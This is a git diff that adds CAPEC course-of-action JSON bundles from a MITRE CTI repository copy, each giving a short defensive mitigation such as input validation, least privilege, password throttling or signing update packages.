diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186.json
new file mode 100644
index 0000000000000000000000000000000000000000..006cfdb86d5fe66b379ba532b7936b00996051ce
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--d9c1d4be-475d-4580-bce8-7b36173d1745",
+ "objects": [
+ {
+ "created": "2021-06-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management of microcode and microcode generating tools and software.",
+ "id": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-672-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json
new file mode 100644
index 0000000000000000000000000000000000000000..32e40536b73165d0b688c77eb8ab124902a0c44c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--b8ecdee2-8cd2-45e0-935b-f156b45261aa",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Design: Enforce principle of least privilege.",
+ "id": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-126-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json
new file mode 100644
index 0000000000000000000000000000000000000000..4ea531f9acba13eb0d37d2b84883cd3ffbfbb71d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--6a76ca5e-1d73-4061-bab1-07ce7a6e4506",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Use hardware security modules/trusted platform modules to verify authenticity using hardware-based cryptography.",
+ "id": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-532-5",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json
new file mode 100644
index 0000000000000000000000000000000000000000..7eefdc1d297e7a32e960a01b35ad048fd2754730
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--19e8f33c-05e6-47d6-b4e0-d14b5f4c17aa",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.",
+ "id": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9",
+ "modified": "2021-10-21T00:00:00.000Z",
+ "name": "coa-100-3",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json
new file mode 100644
index 0000000000000000000000000000000000000000..3dad2fbb1c2bd667ee5b0f3fe967c5ff8929564e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--d84989ed-26f3-457e-9a87-0aa2cc21f9c6",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.",
+ "id": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "name": "coa-49-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json
new file mode 100644
index 0000000000000000000000000000000000000000..83323abcb2f3632d174516c2dbd7bb900ef2d53f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--a93e97ab-d799-4cf5-9944-ea4a57403526",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.",
+ "id": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "name": "coa-135-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json
new file mode 100644
index 0000000000000000000000000000000000000000..9367727459713c9486fc91a2a58b5c0e3ff202ab
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--44380af6-6153-49e6-9030-95200c0c39c5",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.",
+ "id": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7",
+ "modified": "2020-12-17T00:00:00.000Z",
+ "name": "coa-228-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--13ef96e6-899a-447b-ae18-9efc1cef937a.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--13ef96e6-899a-447b-ae18-9efc1cef937a.json
new file mode 100644
index 0000000000000000000000000000000000000000..8fc8ebbea984ccc41b51425c119e4440532e82c4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--13ef96e6-899a-447b-ae18-9efc1cef937a.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--67acce40-8131-4516-b303-d5f09b01a4b9",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Educate designers, developers, engineers, etc. on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks",
+ "id": "course-of-action--13ef96e6-899a-447b-ae18-9efc1cef937a",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "name": "coa-537-3",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.7"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json
new file mode 100644
index 0000000000000000000000000000000000000000..82e2be5d1856708750d31e33953b2b98ffd2d3d1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--e9ab19f6-7a46-4a74-9453-69bd34f25036",
+ "objects": [
+ {
+ "created": "2021-06-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "When using Bluetooth, set it to hidden or non-discoverable mode.",
+ "id": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-666-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55.json
new file mode 100644
index 0000000000000000000000000000000000000000..0595e3e40c718dbaaa5dcd4b4f6f8904050a812a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55.json
@@ -0,0 +1,20 @@ +{ + "id": "bundle--4ba760f2-351f-4f3c-a404-9c90fd49f70e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid emailing important documents and configurations.", + "id": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json new file mode 100644 index 0000000000000000000000000000000000000000..e3a58e03dde4dbeb4e05d273d25214e7ed2bcb5d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--7103ec74-ef0a-4021-b2b4-c46d661730ef", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only accept software updates from an official source.", + "id": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-533-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json new file mode 100644 index 0000000000000000000000000000000000000000..0cf546c9db7ea6729eed07979368535bd3f41666 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a714c137-380a-4589-9950-543ca2c52ddf", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.", + "id": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11.json new file mode 100644 index 0000000000000000000000000000000000000000..a56fcf71d3723814970aea2ac2fba6a13412b32a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--0c677580-4ee2-49ff-90d1-8f33ece54b74", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.", + "id": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49.json new file mode 100644 index 0000000000000000000000000000000000000000..3765882eafaa61222dace954c204554e78e759a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4fddebd9-4740-4b73-9a47-e68b16bf1e0d", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require elevated privileges for distribution of software and software updates.", + "id": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905.json new file mode 100644 index 0000000000000000000000000000000000000000..828b3349820882f2a11f8fd30e1f38b3972265cd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--367d2508-c450-4c5e-a6b0-8e7b2a36fc2a", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor and control access to the configuration management system.", + "id": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299.json new file mode 100644 index 0000000000000000000000000000000000000000..52d4de8422e13264b6dcc5319939111a25bcbebf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--efb9414d-e6d7-4a0b-83b5-abafedd0dde7", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.", + "id": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57.json new file mode 100644 index 0000000000000000000000000000000000000000..28e2fa3be9b7ad1a3f77f65c65986851547c7dbb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--834020e5-7f97-46d6-901c-e21e908b2d64", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5.json new file mode 100644 index 0000000000000000000000000000000000000000..457637df511b76c9be5f16820d0c7c63aebd5740 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--281e58ab-0b27-4a14-8e95-021fe34db978", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.", + "id": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4.json new file mode 100644 index 0000000000000000000000000000000000000000..0e2367daba98e4c12873f123230f94a35af6f8e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--0b5f7a1a-f961-4210-93fb-9e2882ba046d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.", + "id": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d.json new file mode 100644 index 0000000000000000000000000000000000000000..bc50bcc24615aefeeda6b8bacdeefa3043760b3d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--6d9e5b32-a08a-48a4-8591-81ad9d878c22", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-19-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e5ecca4e-c16e-4c31-bde1-c6778a1381f0.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e5ecca4e-c16e-4c31-bde1-c6778a1381f0.json new file mode 100644 index 0000000000000000000000000000000000000000..b82ddbf9da31ae27c0c317408c3ad8ba806d04d1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e5ecca4e-c16e-4c31-bde1-c6778a1381f0.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--10732765-293a-48d4-bf4a-2303dc3ad8af", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Backup device data before erasure to retain intellectual property and inside knowledge.", + "id": "course-of-action--e5ecca4e-c16e-4c31-bde1-c6778a1381f0", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-675-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json new file mode 100644 index 0000000000000000000000000000000000000000..ce7e4ed5bdb054730be5a07e616073fdae26232d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--994f7fd6-42c1-4ae9-8849-4ac24cafad9e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses.", + "id": "course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-275-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a.json new file mode 100644 index 0000000000000000000000000000000000000000..4c4a1caff4820b3f9946064629c5851bff5ed97b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--4afadb2b-fdf1-43e7-9d21-1d2391616701", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the development environment that includes: Maintaining strict security administration and configuration management of requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools.", + "id": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937.json new file mode 100644 index 0000000000000000000000000000000000000000..5c33e7320fe2aede18685b56b8e3d55a278f642b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937.json 
